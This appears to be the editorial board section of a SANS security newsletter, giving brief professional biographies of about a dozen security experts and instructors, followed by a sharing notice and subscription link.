Stephen Northcutt teaches advanced courses in cyber security management; he founded the GIAC certification and was the founding President of STI, the premier skills-based cyber security graduate school, www.sans.edu.
Dr. Johannes Ullrich is Chief Technology Officer of the Internet Storm Center and Dean of the Faculty of the graduate school at the SANS Technology Institute.
William Hugh Murray is an executive consultant and trainer in Information Assurance and Associate Professor at the Naval Postgraduate School.
Lee Neely is a Senior Cyber Analyst at Lawrence Livermore National Laboratory, SANS Analyst and Mentor. He has worked in computer security since 1989.
Rob Lee is the SANS Institute's top forensics instructor and director of the digital forensics and incident response research and education program at SANS (computer-forensics.sans.org).
Tom Liston is member of the Cyber Network Defense team at UAE-based Dark Matter. He is a Handler for the SANS Institute's Internet Storm Center and co-author of the book Counter Hack Reloaded.
Jake Williams is a SANS course author and the founder of Rendition Infosec, with experience securing DoD, healthcare, and ICS environments.
Dr. Eric Cole is an instructor, author and fellow with The SANS Institute. He has written five books, including Insider Threat and he is a founder with Secure Anchor Consulting.
David Hoelzer is the director of research & principal examiner for Enclave Forensics and a senior fellow with the SANS Technology Institute.
Gal Shpantzer is a trusted advisor to CSOs of large corporations, technology startups, Ivy League universities and non-profits specializing in critical infrastructure protection. Gal created the Security Outliers project in 2009, focusing on the role of culture in risk management outcomes and contributes to the Infosec Burnout project.
Alan Paller is director of research at the SANS Institute.
Brian Honan is an independent security consultant based in Dublin, Ireland.
Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription visit https://www.sans.org/account/create